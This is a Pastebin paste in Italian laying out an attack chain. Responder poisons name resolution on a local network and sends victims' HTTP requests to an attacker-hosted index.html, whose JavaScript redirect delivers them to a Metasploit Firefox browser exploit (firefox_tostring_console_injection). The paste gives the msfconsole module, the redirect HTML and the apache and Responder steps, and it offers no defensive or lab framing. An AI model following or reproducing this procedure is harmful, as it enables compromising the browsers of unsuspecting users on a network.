Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Disabilità il server HTTP nel file di configurazione di Responder.
- In msfconsole usa exploit/multi/browser/firefox_tostring_console_injection e fai partire l'exploit.
- L'exploit genererà un URL (esempio: http://192.168.1.25:8080/zjZ5pR), copialo e crea un file index.html in /var/www/html/ con il seguente contenuto:
- <html>
- <body>
- <script>window.location.href = 'URL_COPIATO';</script>
- </body>
- </html>
- Avvia un server apache con il comando:
- service apache2 start
- Avvia Responder ed aspetta.
- Quello che succederà sarà: Responder farà in modo che tu riceva una richiesta HTTP sul tuo index.html che a sua volta indirizzerà il browser vittima sull'URL con l'exploit.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement